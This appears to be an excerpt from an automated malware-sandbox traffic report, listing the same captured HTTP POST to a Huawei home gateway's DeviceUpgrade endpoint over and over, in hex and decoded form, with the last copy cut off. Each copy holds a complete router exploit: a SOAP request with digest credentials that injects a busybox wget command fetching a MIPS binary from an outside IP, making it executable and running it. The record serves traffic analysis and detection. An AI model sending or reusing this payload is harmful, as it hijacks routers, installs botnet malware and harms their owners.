Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 